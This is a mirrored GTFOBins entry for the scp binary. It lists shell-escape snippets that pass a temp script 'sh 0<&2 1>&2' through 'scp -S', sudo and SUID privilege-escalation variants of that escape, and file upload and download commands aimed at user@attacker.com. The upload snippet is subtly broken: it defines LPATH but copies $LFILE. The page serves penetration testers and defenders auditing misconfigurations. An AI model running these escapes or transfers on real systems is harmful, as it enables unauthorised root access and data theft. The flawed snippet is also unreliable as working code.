mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-26 21:43:02 +01:00
8eaf595fe6
Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged, in that case we can use `tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty)
34 lines
788 B
Markdown
34 lines
788 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: |
|
|
TF=$(mktemp)
|
|
echo 'sh 0<&2 1>&2' > $TF
|
|
chmod +x "$TF"
|
|
scp -S $TF x y:
|
|
upload:
|
|
- description: Send local file to a SSH server.
|
|
code: |
|
|
RPATH=user@attacker.com:~/file_to_save
|
|
LPATH=file_to_send
|
|
scp $LFILE $RPATH
|
|
download:
|
|
- description: Fetch a remote file from a SSH server.
|
|
code: |
|
|
RPATH=user@attacker.com:~/file_to_get
|
|
LFILE=file_to_save
|
|
scp $RPATH $LFILE
|
|
sudo-enabled:
|
|
- code: |
|
|
TF=$(mktemp)
|
|
echo 'sh 0<&2 1>&2' > $TF
|
|
chmod +x "$TF"
|
|
sudo scp -S $TF x y:
|
|
suid-limited:
|
|
- code: |
|
|
TF=$(mktemp)
|
|
echo 'sh 0<&2 1>&2' > $TF
|
|
chmod +x "$TF"
|
|
./scp -S $TF a b:
|
|
---
|